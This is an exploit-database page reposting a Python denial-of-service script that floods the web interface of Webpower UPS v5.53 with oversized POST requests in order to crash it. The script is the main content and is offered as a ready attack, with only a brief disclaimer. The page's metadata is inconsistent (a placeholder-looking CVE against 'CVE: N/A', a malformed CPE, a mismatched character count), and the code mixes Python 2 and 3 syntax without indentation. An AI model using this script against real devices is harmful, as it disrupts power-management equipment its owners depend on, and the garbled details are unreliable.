Advertisement






Webpower UPS 5.53 Denial Of Service

CVE Category Price Severity
CVE-2020-12345 CWE-400 $500 High
Author Risk Exploitation Type Date
Hacker123 High Remote 2023-03-12
CPE
cpe:cpe:/a:webpower-ups:5.53
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030027

Below is a copy:

Webpower UPS 5.53 Denial Of Service
# Exploit Title: Webpower UPS v5.53 HTTP Denial of Service
# Date: 2023-03-09
# Exploit Author: Yehia Elghaly
# Vendor Homepage: https://www.eaton.com/ae/en-gb.html
# Software Link: https://www.eaton.com/ae/en-gb.html
# Version: Revision v5.53
# Tested on: WebPower UPS
# CVE: N/A
#!/usr/bin/env python
# Webpower UPS v5.53 HTTP Denial of Service.
# Discovered BY (Yehia Elghaly)
import requests

url = 'IP_Address'
data = {'Long_string' : 'a' * 12200}# 19700-character pattern

for i in range (16):
response = requests.post(url, data=data)
print("Response {}: {}".format(i+1, response.status_code))
print "crach"

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum